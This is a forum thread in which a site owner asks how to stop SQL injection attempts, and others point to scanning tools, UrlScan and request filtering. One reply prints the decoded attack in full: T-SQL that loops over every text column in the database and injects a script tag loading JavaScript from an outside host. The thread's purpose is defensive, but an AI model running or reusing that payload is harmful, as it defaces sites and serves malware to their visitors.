I havereceived a few attempts of SQL injection attacks on my site. As far as I am aware they were unsuccessfull, but is there anything I can do to stop the attacks from happening in the first place? The querystring is very long and looks like this:
Joe Stagner has been covering this. On this page you can find a free tool that will evaluate your code: http://www.misfitgeek.com/Tools+To+Block+And+Eradicate+SQL+Injection.aspx
This posting describe the attack in detail http://isc.sans.org/diary.html?storyid=4565 Bruce DiscountASP.NET www.DiscountASP.NET
wisemx, thanks for pointing to the free tools. Bruce, thanks for the link to the explanation of the attack. I hadn'tfound that myself.It's always interesting to know. One of the toolsrecommended by Joe Stagner is UrlScan.Can I use that tool ondiscountasp?
Hi, I decoded your script: DECLARE @S CHAR(4000);SET @S=DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']='''></title><script src='http://www0.douhunqn.cn/csrss/w.js'></script><!--''+['+@C+'] where '+@C+' not like ''%'></title><script src='http://www0.douhunqn.cn/csrss/w.js'></script><!--''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); I resolved this type of attack by end request which contains specified string e.g. DECLARE @S CHAR(4000); in BeginRequest event. Alexei Cioina. My Web Sitewww.californiadreamhomesandland.com/Pages/ReportExplorer.aspx?ItmPath_25B7ED104E83=/English/Web%20Master/Web%20Site%20Statistics
You cannot mess w/ the URLScan rule on IIS6 on a per site basis. You can, however, do this on IIS7 Bruce DiscountASP.NET www.DiscountASP.NET
